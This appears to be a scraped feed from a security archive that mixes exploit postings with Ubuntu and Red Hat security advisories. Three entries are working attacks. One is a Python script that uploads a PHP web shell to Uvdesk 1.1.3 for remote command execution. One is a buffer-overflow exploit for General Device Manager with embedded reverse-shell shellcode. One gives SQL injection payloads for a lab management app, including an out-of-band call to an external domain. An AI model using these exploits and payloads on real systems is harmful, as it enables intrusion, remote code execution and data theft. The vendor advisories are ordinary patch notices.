Uvdesk version 1.1.3 suffers from a remote shell upload vulnerability.

    # Exploit Title: Uvdesk v1.1.3 - File Upload Remote Code Execution (RCE) (Authenticated)# Date: 28/07/2023# Exploit Author: Daniel Barros (@cupc4k3d) - Hakai Offensive Security # Vendor Homepage: https://www.uvdesk.com# Software Link: https://github.com/uvdesk/community-skeleton# Version: 1.1.3# Example: python3 CVE-2023-39147.py -u "http://$ip:8000/" -c "whoami"# CVE : CVE-2023-39147# Tested on: Ubuntu 20.04.6import requestsimport argparsedef get_args():    parser = argparse.ArgumentParser()    parser.add_argument('-u', '--url', required=True, action='store', help='Target url')    parser.add_argument('-c', '--command', required=True, action='store', help='Command to execute')    my_args = parser.parse_args()    return my_argsdef main():    args = get_args()    base_url = args.url    command = args.command    uploaded_file = "shell.php"    url_cmd = base_url + "//assets/knowledgebase/shell.php?cmd=" + command# Edit your credentials here    login_data = {        "_username": "admin@adm.com",        "_password": "passwd",        "_remember_me": "off"    }    files = {        "name": (None, "pwn"),        "description": (None, "xxt"),        "visibility": (None, "public"),        "solutionImage": (uploaded_file, "<?php system($_GET['cmd']); ?>", "image/jpg")    }    s = requests.session()    # Login    s.post(base_url + "/en/member/login", data=login_data)    # Upload    upload_response = s.post(base_url + "/en/member/knowledgebase/folders/new", files=files)    # Execute command    cmd = s.get(url_cmd)    print(cmd.text)if __name__ == "__main__":    main()

Uvdesk 1.1.3 Shell Upload

Ubuntu Security Notice 6263-1 - Motoyasu Saburi discovered that OpenJDK incorrectly handled special characters in file name parameters. An attacker could possibly use this issue to insert, edit or obtain sensitive information. This issue only affected OpenJDK 11 and OpenJDK 17. Eirik Bjørsnøs discovered that OpenJDK incorrectly handled certain ZIP archives. An attacker could possibly use this issue to cause a denial of service. This issue only affected OpenJDK 11 and OpenJDK 17.

==========================================================================  
Ubuntu Security Notice USN-6263-1  
August 01, 2023

openjdk-8, openjdk-lts, openjdk-17 vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.04  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 16.04 LTS (Available with Ubuntu Pro)

Summary:

Several security issues were fixed in OpenJDK.

Software Description:  
- openjdk-17: Open Source Java implementation  
- openjdk-8: Open Source Java implementation  
- openjdk-lts: Open Source Java implementation

Details:

Motoyasu Saburi discovered that OpenJDK incorrectly handled special  
characters in file name parameters. An attacker could possibly use  
this issue to insert, edit or obtain sensitive information. This issue  
only affected OpenJDK 11 and OpenJDK 17. (CVE-2023-22006)

Eirik Bjørsnøs discovered that OpenJDK incorrectly handled certain ZIP  
archives. An attacker could possibly use this issue to cause a denial  
of service. This issue only affected OpenJDK 11 and OpenJDK 17.  
(CVE-2023-22036)

David Stancu discovered that OpenJDK had a flaw in the AES cipher  
implementation. An attacker could possibly use this issue to obtain  
sensitive information. This issue only affected OpenJDK 11 and OpenJDK 17.  
(CVE-2023-22041)

Zhiqiang Zang discovered that OpenJDK incorrectly handled array accesses  
when using the binary '%' operator. An attacker could possibly use this  
issue to obtain sensitive information. This issue only affected OpenJDK 17.  
(CVE-2023-22044)

Zhiqiang Zang discovered that OpenJDK incorrectly handled array accesses.  
An attacker could possibly use this issue to obtain sensitive information.  
(CVE-2023-22045)

It was discovered that OpenJDK incorrectly sanitized URIs strings. An  
attacker could possibly use this issue to insert, edit or obtain sensitive  
information. (CVE-2023-22049)

It was discovered that OpenJDK incorrectly handled certain glyphs. An  
attacker could possibly use this issue to cause a denial of service.  
This issue only affected OpenJDK 11 and OpenJDK 17.  
(CVE-2023-25193)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.04:  
  openjdk-11-jdk                  11.0.20+8-1ubuntu1~23.04  
  openjdk-11-jre                  11.0.20+8-1ubuntu1~23.04  
  openjdk-11-jre-headless         11.0.20+8-1ubuntu1~23.04  
  openjdk-11-jre-zero             11.0.20+8-1ubuntu1~23.04  
  openjdk-17-jdk                  17.0.8+7-1~23.04  
  openjdk-17-jre                  17.0.8+7-1~23.04  
  openjdk-17-jre-headless         17.0.8+7-1~23.04  
  openjdk-17-jre-zero             17.0.8+7-1~23.04  
  openjdk-8-jdk                   8u382-ga-1~23.04.1  
  openjdk-8-jre                   8u382-ga-1~23.04.1  
  openjdk-8-jre-headless          8u382-ga-1~23.04.1  
  openjdk-8-jre-zero              8u382-ga-1~23.04.1

Ubuntu 22.04 LTS:  
  openjdk-11-jdk                  11.0.20+8-1ubuntu1~22.04  
  openjdk-11-jre                  11.0.20+8-1ubuntu1~22.04  
  openjdk-11-jre-headless         11.0.20+8-1ubuntu1~22.04  
  openjdk-11-jre-zero             11.0.20+8-1ubuntu1~22.04  
  openjdk-17-jdk                  17.0.8+7-1~22.04  
  openjdk-17-jre                  17.0.8+7-1~22.04  
  openjdk-17-jre-headless         17.0.8+7-1~22.04  
  openjdk-17-jre-zero             17.0.8+7-1~22.04  
  openjdk-8-jdk                   8u382-ga-1~22.04.1  
  openjdk-8-jre                   8u382-ga-1~22.04.1  
  openjdk-8-jre-headless          8u382-ga-1~22.04.1  
  openjdk-8-jre-zero              8u382-ga-1~22.04.1

Ubuntu 20.04 LTS:  
  openjdk-11-jdk                  11.0.20+8-1ubuntu1~20.04  
  openjdk-11-jre                  11.0.20+8-1ubuntu1~20.04  
  openjdk-11-jre-headless         11.0.20+8-1ubuntu1~20.04  
  openjdk-11-jre-zero             11.0.20+8-1ubuntu1~20.04  
  openjdk-17-jdk                  17.0.8+7-1~20.04.2  
  openjdk-17-jre                  17.0.8+7-1~20.04.2  
  openjdk-17-jre-headless         17.0.8+7-1~20.04.2  
  openjdk-17-jre-zero             17.0.8+7-1~20.04.2  
  openjdk-8-jdk                   8u382-ga-1~20.04.1  
  openjdk-8-jre                   8u382-ga-1~20.04.1  
  openjdk-8-jre-headless          8u382-ga-1~20.04.1  
  openjdk-8-jre-zero              8u382-ga-1~20.04.1

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
  openjdk-11-jdk                  11.0.20+8-1ubuntu1~18.04  
  openjdk-11-jre                  11.0.20+8-1ubuntu1~18.04  
  openjdk-11-jre-headless         11.0.20+8-1ubuntu1~18.04  
  openjdk-11-jre-zero             11.0.20+8-1ubuntu1~18.04  
  openjdk-17-jdk                  17.0.8+7-1~18.04  
  openjdk-17-jre                  17.0.8+7-1~18.04  
  openjdk-17-jre-headless         17.0.8+7-1~18.04  
  openjdk-17-jre-zero             17.0.8+7-1~18.04  
  openjdk-8-jdk                   8u382-ga-1~18.04.1  
  openjdk-8-jre                   8u382-ga-1~18.04.1  
  openjdk-8-jre-headless          8u382-ga-1~18.04.1  
  openjdk-8-jre-zero              8u382-ga-1~18.04.1

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
  openjdk-8-jdk                   8u382-ga-1~16.04.1  
  openjdk-8-jre                   8u382-ga-1~16.04.1  
  openjdk-8-jre-headless          8u382-ga-1~16.04.1  
  openjdk-8-jre-zero              8u382-ga-1~16.04.1

This update uses a new upstream release, which includes additional  
bug fixes. After a standard system update you need to restart any  
Java applications or applets to make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6263-1  
  CVE-2023-22006, CVE-2023-22036, CVE-2023-22041, CVE-2023-22044,  
  CVE-2023-22045, CVE-2023-22049, CVE-2023-25193

Package Information:  
  https://launchpad.net/ubuntu/+source/openjdk-17/17.0.8+7-1~23.04  
  https://launchpad.net/ubuntu/+source/openjdk-8/8u382-ga-1~23.04.1  
  https://launchpad.net/ubuntu/+source/openjdk-lts/11.0.20+8-1ubuntu1~23.04  
  https://launchpad.net/ubuntu/+source/openjdk-17/17.0.8+7-1~22.04  
  https://launchpad.net/ubuntu/+source/openjdk-8/8u382-ga-1~22.04.1  
  https://launchpad.net/ubuntu/+source/openjdk-lts/11.0.20+8-1ubuntu1~22.04  
  https://launchpad.net/ubuntu/+source/openjdk-17/17.0.8+7-1~20.04.2  
  https://launchpad.net/ubuntu/+source/openjdk-8/8u382-ga-1~20.04.1  
  https://launchpad.net/ubuntu/+source/openjdk-lts/11.0.20+8-1ubuntu1~20.04

Ubuntu Security Notice USN-6263-1

General Device Manager version 2.5.2.2 suffers from a buffer overflow vulnerability.

    # Exploit Title: General Device Manager 2.5.2.2 - Buffer Overflow (SEH)# Date: 30.07.2023# Software Link: https://download.xm030.cn/d/MDAwMDA2NTQ=# Software Link 2:https://www.maxiguvenlik.com/uploads/importfiles/General_DeviceManager.zip# Exploit Author: Ahmet Ümit BAYRAM# Tested Version: 2.5.2.2# Tested on: Windows 10 64bit# 1.- Run python code : exploit.py# 2.- Open pwned.txt and copy all content to clipboard# 3.- Open Device Manage and press Add Device# 4.- Paste the content of pwned.txt into the 'IP Address'# 5.- Click 'OK'# 6.- nc.exe local IP Port 1337 and you will have a bind shell# 7.- R.I.P. Condor <3import structoffset = b"A" * 1308nseh = b"\xEB\x06\x90\x90" # jmp shortseh = struct.pack('<I', 0x10081827) # 0x10081827 : pop ebx # pop esi # ret  | ascii {PAGE_EXECUTE_READ} [NetSDK.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.0.8.66 (C:\Program Files (x86)\DeviceManage\NetSDK.dll)nops = b"\x90" * 32 #shellcode: msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1  LPORT=1337 EXITFUNC=thread -a x86 --platform windows -b "\x00\x0a\x0d" -f python --var-name shellcodeshellcode =  b""shellcode += b"\xd9\xc6\xbb\xae\xc7\xed\x8e\xd9\x74\x24\xf4"shellcode += b"\x5a\x29\xc9\xb1\x52\x83\xea\xfc\x31\x5a\x13"shellcode += b"\x03\xf4\xd4\x0f\x7b\xf4\x33\x4d\x84\x04\xc4"shellcode += b"\x32\x0c\xe1\xf5\x72\x6a\x62\xa5\x42\xf8\x26"shellcode += b"\x4a\x28\xac\xd2\xd9\x5c\x79\xd5\x6a\xea\x5f"shellcode += b"\xd8\x6b\x47\xa3\x7b\xe8\x9a\xf0\x5b\xd1\x54"shellcode += b"\x05\x9a\x16\x88\xe4\xce\xcf\xc6\x5b\xfe\x64"shellcode += b"\x92\x67\x75\x36\x32\xe0\x6a\x8f\x35\xc1\x3d"shellcode += b"\x9b\x6f\xc1\xbc\x48\x04\x48\xa6\x8d\x21\x02"shellcode += b"\x5d\x65\xdd\x95\xb7\xb7\x1e\x39\xf6\x77\xed"shellcode += b"\x43\x3f\xbf\x0e\x36\x49\xc3\xb3\x41\x8e\xb9"shellcode += b"\x6f\xc7\x14\x19\xfb\x7f\xf0\x9b\x28\x19\x73"shellcode += b"\x97\x85\x6d\xdb\xb4\x18\xa1\x50\xc0\x91\x44"shellcode += b"\xb6\x40\xe1\x62\x12\x08\xb1\x0b\x03\xf4\x14"shellcode += b"\x33\x53\x57\xc8\x91\x18\x7a\x1d\xa8\x43\x13"shellcode += b"\xd2\x81\x7b\xe3\x7c\x91\x08\xd1\x23\x09\x86"shellcode += b"\x59\xab\x97\x51\x9d\x86\x60\xcd\x60\x29\x91"shellcode += b"\xc4\xa6\x7d\xc1\x7e\x0e\xfe\x8a\x7e\xaf\x2b"shellcode += b"\x1c\x2e\x1f\x84\xdd\x9e\xdf\x74\xb6\xf4\xef"shellcode += b"\xab\xa6\xf7\x25\xc4\x4d\x02\xae\x94\x91\x0c"shellcode += b"\x2f\x03\x90\x0c\x2a\xea\x1d\xea\x5e\x1c\x48"shellcode += b"\xa5\xf6\x85\xd1\x3d\x66\x49\xcc\x38\xa8\xc1"shellcode += b"\xe3\xbd\x67\x22\x89\xad\x10\xc2\xc4\x8f\xb7"shellcode += b"\xdd\xf2\xa7\x54\x4f\x99\x37\x12\x6c\x36\x60"shellcode += b"\x73\x42\x4f\xe4\x69\xfd\xf9\x1a\x70\x9b\xc2"shellcode += b"\x9e\xaf\x58\xcc\x1f\x3d\xe4\xea\x0f\xfb\xe5"shellcode += b"\xb6\x7b\x53\xb0\x60\xd5\x15\x6a\xc3\x8f\xcf"shellcode += b"\xc1\x8d\x47\x89\x29\x0e\x11\x96\x67\xf8\xfd"shellcode += b"\x27\xde\xbd\x02\x87\xb6\x49\x7b\xf5\x26\xb5"shellcode += b"\x56\xbd\x47\x54\x72\xc8\xef\xc1\x17\x71\x72"shellcode += b"\xf2\xc2\xb6\x8b\x71\xe6\x46\x68\x69\x83\x43"shellcode += b"\x34\x2d\x78\x3e\x25\xd8\x7e\xed\x46\xc9"final_payload = offset + nseh + seh + nops + shellcode# write the final payload to a filetry:    with open('pwned.txt', 'wb') as f:        print("[+] Creating %s bytes evil payload..." %len(final_payload))        f.write(final_payload)        f.close()        print("[+] File created!")except:    print("File cannot be created!")

General Device Manager 2.5.2.2 Buffer Overflow

Red Hat Security Advisory 2023-4409-01 - The mod_auth_openidc is an OpenID Connect authentication module for Apache HTTP Server. It enables an Apache HTTP Server to operate as an OpenID Connect Relying Party and/or OAuth 2.0 Resource Server.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: mod_auth_openidc:2.3 security update  
Advisory ID:       RHSA-2023:4409-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4409  
Issue date:        2023-08-01  
CVE Names:         CVE-2023-37464   
=====================================================================

1. Summary:

An update for the mod_auth_openidc:2.3 module is now available for Red Hat  
Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat  
Enterprise Linux 8.4 Telecommunications Update Service, and Red Hat  
Enterprise Linux 8.4 Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream AUS (v.8.4) - x86_64  
Red Hat Enterprise Linux AppStream E4S (v.8.4) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream TUS (v.8.4) - aarch64, ppc64le, s390x, x86_64

3. Description:

The mod_auth_openidc is an OpenID Connect authentication module for Apache  
HTTP Server. It enables an Apache HTTP Server to operate as an OpenID  
Connect Relying Party and/or OAuth 2.0 Resource Server.

Security Fix(es):

* cjose: AES GCM decryption uses the Tag length from the actual  
Authentication Tag provided in the JWE (CVE-2023-37464)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2223295 - CVE-2023-37464 cjose: AES GCM decryption uses the Tag length from the actual Authentication Tag provided in the JWE

6. Package List:

Red Hat Enterprise Linux AppStream AUS (v.8.4):

Source:  
cjose-0.6.1-3.module+el8.4.0+19462+14bde120.src.rpm  
mod_auth_openidc-2.3.7-8.module+el8.4.0+9707+f2438af7.src.rpm

x86_64:  
cjose-0.6.1-3.module+el8.4.0+19462+14bde120.x86_64.rpm  
cjose-debuginfo-0.6.1-3.module+el8.4.0+19462+14bde120.x86_64.rpm  
cjose-debugsource-0.6.1-3.module+el8.4.0+19462+14bde120.x86_64.rpm  
cjose-devel-0.6.1-3.module+el8.4.0+19462+14bde120.x86_64.rpm  
mod_auth_openidc-2.3.7-8.module+el8.4.0+9707+f2438af7.x86_64.rpm  
mod_auth_openidc-debuginfo-2.3.7-8.module+el8.4.0+9707+f2438af7.x86_64.rpm  
mod_auth_openidc-debugsource-2.3.7-8.module+el8.4.0+9707+f2438af7.x86_64.rpm

Red Hat Enterprise Linux AppStream E4S (v.8.4):

Source:  
cjose-0.6.1-3.module+el8.4.0+19462+14bde120.src.rpm  
mod_auth_openidc-2.3.7-8.module+el8.4.0+9707+f2438af7.src.rpm

aarch64:  
cjose-0.6.1-3.module+el8.4.0+19462+14bde120.aarch64.rpm  
cjose-debuginfo-0.6.1-3.module+el8.4.0+19462+14bde120.aarch64.rpm  
cjose-debugsource-0.6.1-3.module+el8.4.0+19462+14bde120.aarch64.rpm  
cjose-devel-0.6.1-3.module+el8.4.0+19462+14bde120.aarch64.rpm  
mod_auth_openidc-2.3.7-8.module+el8.4.0+9707+f2438af7.aarch64.rpm  
mod_auth_openidc-debuginfo-2.3.7-8.module+el8.4.0+9707+f2438af7.aarch64.rpm  
mod_auth_openidc-debugsource-2.3.7-8.module+el8.4.0+9707+f2438af7.aarch64.rpm

ppc64le:  
cjose-0.6.1-3.module+el8.4.0+19462+14bde120.ppc64le.rpm  
cjose-debuginfo-0.6.1-3.module+el8.4.0+19462+14bde120.ppc64le.rpm  
cjose-debugsource-0.6.1-3.module+el8.4.0+19462+14bde120.ppc64le.rpm  
cjose-devel-0.6.1-3.module+el8.4.0+19462+14bde120.ppc64le.rpm  
mod_auth_openidc-2.3.7-8.module+el8.4.0+9707+f2438af7.ppc64le.rpm  
mod_auth_openidc-debuginfo-2.3.7-8.module+el8.4.0+9707+f2438af7.ppc64le.rpm  
mod_auth_openidc-debugsource-2.3.7-8.module+el8.4.0+9707+f2438af7.ppc64le.rpm

s390x:  
cjose-0.6.1-3.module+el8.4.0+19462+14bde120.s390x.rpm  
cjose-debuginfo-0.6.1-3.module+el8.4.0+19462+14bde120.s390x.rpm  
cjose-debugsource-0.6.1-3.module+el8.4.0+19462+14bde120.s390x.rpm  
cjose-devel-0.6.1-3.module+el8.4.0+19462+14bde120.s390x.rpm  
mod_auth_openidc-2.3.7-8.module+el8.4.0+9707+f2438af7.s390x.rpm  
mod_auth_openidc-debuginfo-2.3.7-8.module+el8.4.0+9707+f2438af7.s390x.rpm  
mod_auth_openidc-debugsource-2.3.7-8.module+el8.4.0+9707+f2438af7.s390x.rpm

x86_64:  
cjose-0.6.1-3.module+el8.4.0+19462+14bde120.x86_64.rpm  
cjose-debuginfo-0.6.1-3.module+el8.4.0+19462+14bde120.x86_64.rpm  
cjose-debugsource-0.6.1-3.module+el8.4.0+19462+14bde120.x86_64.rpm  
cjose-devel-0.6.1-3.module+el8.4.0+19462+14bde120.x86_64.rpm  
mod_auth_openidc-2.3.7-8.module+el8.4.0+9707+f2438af7.x86_64.rpm  
mod_auth_openidc-debuginfo-2.3.7-8.module+el8.4.0+9707+f2438af7.x86_64.rpm  
mod_auth_openidc-debugsource-2.3.7-8.module+el8.4.0+9707+f2438af7.x86_64.rpm

Red Hat Enterprise Linux AppStream TUS (v.8.4):

Source:  
cjose-0.6.1-3.module+el8.4.0+19462+14bde120.src.rpm  
mod_auth_openidc-2.3.7-8.module+el8.4.0+9707+f2438af7.src.rpm

aarch64:  
cjose-0.6.1-3.module+el8.4.0+19462+14bde120.aarch64.rpm  
cjose-debuginfo-0.6.1-3.module+el8.4.0+19462+14bde120.aarch64.rpm  
cjose-debugsource-0.6.1-3.module+el8.4.0+19462+14bde120.aarch64.rpm  
cjose-devel-0.6.1-3.module+el8.4.0+19462+14bde120.aarch64.rpm  
mod_auth_openidc-2.3.7-8.module+el8.4.0+9707+f2438af7.aarch64.rpm  
mod_auth_openidc-debuginfo-2.3.7-8.module+el8.4.0+9707+f2438af7.aarch64.rpm  
mod_auth_openidc-debugsource-2.3.7-8.module+el8.4.0+9707+f2438af7.aarch64.rpm

ppc64le:  
cjose-0.6.1-3.module+el8.4.0+19462+14bde120.ppc64le.rpm  
cjose-debuginfo-0.6.1-3.module+el8.4.0+19462+14bde120.ppc64le.rpm  
cjose-debugsource-0.6.1-3.module+el8.4.0+19462+14bde120.ppc64le.rpm  
cjose-devel-0.6.1-3.module+el8.4.0+19462+14bde120.ppc64le.rpm  
mod_auth_openidc-2.3.7-8.module+el8.4.0+9707+f2438af7.ppc64le.rpm  
mod_auth_openidc-debuginfo-2.3.7-8.module+el8.4.0+9707+f2438af7.ppc64le.rpm  
mod_auth_openidc-debugsource-2.3.7-8.module+el8.4.0+9707+f2438af7.ppc64le.rpm

s390x:  
cjose-0.6.1-3.module+el8.4.0+19462+14bde120.s390x.rpm  
cjose-debuginfo-0.6.1-3.module+el8.4.0+19462+14bde120.s390x.rpm  
cjose-debugsource-0.6.1-3.module+el8.4.0+19462+14bde120.s390x.rpm  
cjose-devel-0.6.1-3.module+el8.4.0+19462+14bde120.s390x.rpm  
mod_auth_openidc-2.3.7-8.module+el8.4.0+9707+f2438af7.s390x.rpm  
mod_auth_openidc-debuginfo-2.3.7-8.module+el8.4.0+9707+f2438af7.s390x.rpm  
mod_auth_openidc-debugsource-2.3.7-8.module+el8.4.0+9707+f2438af7.s390x.rpm

x86_64:  
cjose-0.6.1-3.module+el8.4.0+19462+14bde120.x86_64.rpm  
cjose-debuginfo-0.6.1-3.module+el8.4.0+19462+14bde120.x86_64.rpm  
cjose-debugsource-0.6.1-3.module+el8.4.0+19462+14bde120.x86_64.rpm  
cjose-devel-0.6.1-3.module+el8.4.0+19462+14bde120.x86_64.rpm  
mod_auth_openidc-2.3.7-8.module+el8.4.0+9707+f2438af7.x86_64.rpm  
mod_auth_openidc-debuginfo-2.3.7-8.module+el8.4.0+9707+f2438af7.x86_64.rpm  
mod_auth_openidc-debugsource-2.3.7-8.module+el8.4.0+9707+f2438af7.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-37464  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJkyRWaAAoJENzjgjWX9erEPFcP+gK3OVqND67C1FVjmRSd2wmw  
8Ddr3SmK5MDIIXbM2pfDN/lcwOoF6M1liIY09Xzz+w+eji7jO43TURcDCyxSscHk  
co9ovFMxi6ZiwDfvklnYbP4UBGw3qpUcz5l7vMqYauU2HI3/1Mk43+p0hgXYm+9u  
q3QgFhuBIYx/2ejOjT9rMgwjzGfk/ZRj933tAo5DkUsX5Rv581zRCJZJgxIC+SE7  
IA6E0Hwh0bsS4Lbxk553mKQJwCA6pJsjLPx3xM/5C0KOlO7bNFxQEuWAvIVhq9+P  
d8iJyzj6BqBsWNlyny0H9N+Ou3cVRr4Ff0nZdlxqpWV19AUFgRsOAg7U0dA91aRT  
vQ0qnY1RNIr9Y5sv+IggeKIS5LtimWZXOqUOhYvzKBGWPesGTU0H1aS1DUk886UN  
azpUl/ILezwnR2U6PDnAHNrjnAOHj7iVin+ifvwnGlPux5DUi/DRxJr+08t50ONr  
ltfqJLgGsQiDVYzsSha4LLtEHPLd3HAk7wV+9Se0NdOE8MwR7WU8Z64/Sp9b2zqL  
1pP2FFRLv0U+cx/r7I8kMNQLVUVqBmZif3vQRSH+zVuXJJoE12GeYB+pPbn4O3s3  
olieOC1m4WHpa9v2Np8pn9e1sNhfwtomOIqb/n/viVZRGzC6Itqg6odGpVSaKbuf  
/SK4aUxetVCed3bK/v/t  
=3+pF  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4409-01

Online Lab Diagnostic Management version 1.0 suffers from a remote SQL injection vulnerability.

    ## Title: Online-Diagnostic-Lab-Management v1.0 Multiple-SQLi## Author: nu11secur1ty## Date: 08/01/2023## Vendor: https://www.youtube.com/watch?v=0nA5xfQ5G0g## Vendor: https://www.youtube.com/@MayuriK## Software: https://www.sourcecodester.com/php/15667/online-diagnostic-lab-management-system-using-php-and-mysql-free-download.html## Reference: https://portswigger.net/web-security/sql-injection## Description:The username parameter appears to be vulnerable to SQL injectionattacks. The payload '+(selectload_file('\\\\im86pxgqgu4kxgnpybjcpvwu1l7ev5qthw5oseg3.mnootupaputkaiisaebeqko.com\\mas'))+'was submitted in the username parameter. This payload injects a SQLsub-query that calls MySQL's load_file function with a UNC file paththat references a URL on an external domain. The applicationinteracted with that domain, indicating that the injected SQL querywas executed. The attacker can steal all information from the databasevery easily.STATUS: HIGH-CRITICAL Vulnerability[+]Payload:```mysql---Parameter: username (POST)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause    Payload: username=-2553' OR 3590=3590-- aPlO&password=y4S!v5f!S4&login=    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: username=hMRUaqVg'+(selectload_file('\\\\im86pxgqgu4kxgnpybjcpvwu1l7ev5qthw5oseg3.mnootupaputkaiisaebeqko.com\\mas'))+''AND (SELECT 2815 FROM (SELECT(SLEEP(15)))TjiG)--NgnE&password=y4S!v5f!S4&login=---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Online-Diagnostic-Lab-Management-1.10)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/07/online-diagnostic-lab-management-v10.html)## Time spend:00:35:00

Online Diagnostic Lab Management 1.0 SQL Injection

Red Hat Security Advisory 2023-4408-01 - The mod_auth_openidc is an OpenID Connect authentication module for Apache HTTP Server. It enables an Apache HTTP Server to operate as an OpenID Connect Relying Party and/or OAuth 2.0 Resource Server.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: mod_auth_openidc:2.3 security update  
Advisory ID:       RHSA-2023:4408-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4408  
Issue date:        2023-08-01  
CVE Names:         CVE-2023-37464   
=====================================================================

1. Summary:

An update for the mod_auth_openidc:2.3 module is now available for Red Hat  
Enterprise Linux 8.6 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.8.6) - aarch64, ppc64le, s390x, x86_64

3. Description:

The mod_auth_openidc is an OpenID Connect authentication module for Apache  
HTTP Server. It enables an Apache HTTP Server to operate as an OpenID  
Connect Relying Party and/or OAuth 2.0 Resource Server.

Security Fix(es):

* cjose: AES GCM decryption uses the Tag length from the actual  
Authentication Tag provided in the JWE (CVE-2023-37464)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2223295 - CVE-2023-37464 cjose: AES GCM decryption uses the Tag length from the actual Authentication Tag provided in the JWE

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.8.6):

Source:  
cjose-0.6.1-3.module+el8.6.0+19463+7d2e1f9c.src.rpm  
mod_auth_openidc-2.3.7-11.module+el8.6.0+14082+b6f23e95.src.rpm

aarch64:  
cjose-0.6.1-3.module+el8.6.0+19463+7d2e1f9c.aarch64.rpm  
cjose-debuginfo-0.6.1-3.module+el8.6.0+19463+7d2e1f9c.aarch64.rpm  
cjose-debugsource-0.6.1-3.module+el8.6.0+19463+7d2e1f9c.aarch64.rpm  
cjose-devel-0.6.1-3.module+el8.6.0+19463+7d2e1f9c.aarch64.rpm  
mod_auth_openidc-2.3.7-11.module+el8.6.0+14082+b6f23e95.aarch64.rpm  
mod_auth_openidc-debuginfo-2.3.7-11.module+el8.6.0+14082+b6f23e95.aarch64.rpm  
mod_auth_openidc-debugsource-2.3.7-11.module+el8.6.0+14082+b6f23e95.aarch64.rpm

ppc64le:  
cjose-0.6.1-3.module+el8.6.0+19463+7d2e1f9c.ppc64le.rpm  
cjose-debuginfo-0.6.1-3.module+el8.6.0+19463+7d2e1f9c.ppc64le.rpm  
cjose-debugsource-0.6.1-3.module+el8.6.0+19463+7d2e1f9c.ppc64le.rpm  
cjose-devel-0.6.1-3.module+el8.6.0+19463+7d2e1f9c.ppc64le.rpm  
mod_auth_openidc-2.3.7-11.module+el8.6.0+14082+b6f23e95.ppc64le.rpm  
mod_auth_openidc-debuginfo-2.3.7-11.module+el8.6.0+14082+b6f23e95.ppc64le.rpm  
mod_auth_openidc-debugsource-2.3.7-11.module+el8.6.0+14082+b6f23e95.ppc64le.rpm

s390x:  
cjose-0.6.1-3.module+el8.6.0+19463+7d2e1f9c.s390x.rpm  
cjose-debuginfo-0.6.1-3.module+el8.6.0+19463+7d2e1f9c.s390x.rpm  
cjose-debugsource-0.6.1-3.module+el8.6.0+19463+7d2e1f9c.s390x.rpm  
cjose-devel-0.6.1-3.module+el8.6.0+19463+7d2e1f9c.s390x.rpm  
mod_auth_openidc-2.3.7-11.module+el8.6.0+14082+b6f23e95.s390x.rpm  
mod_auth_openidc-debuginfo-2.3.7-11.module+el8.6.0+14082+b6f23e95.s390x.rpm  
mod_auth_openidc-debugsource-2.3.7-11.module+el8.6.0+14082+b6f23e95.s390x.rpm

x86_64:  
cjose-0.6.1-3.module+el8.6.0+19463+7d2e1f9c.x86_64.rpm  
cjose-debuginfo-0.6.1-3.module+el8.6.0+19463+7d2e1f9c.x86_64.rpm  
cjose-debugsource-0.6.1-3.module+el8.6.0+19463+7d2e1f9c.x86_64.rpm  
cjose-devel-0.6.1-3.module+el8.6.0+19463+7d2e1f9c.x86_64.rpm  
mod_auth_openidc-2.3.7-11.module+el8.6.0+14082+b6f23e95.x86_64.rpm  
mod_auth_openidc-debuginfo-2.3.7-11.module+el8.6.0+14082+b6f23e95.x86_64.rpm  
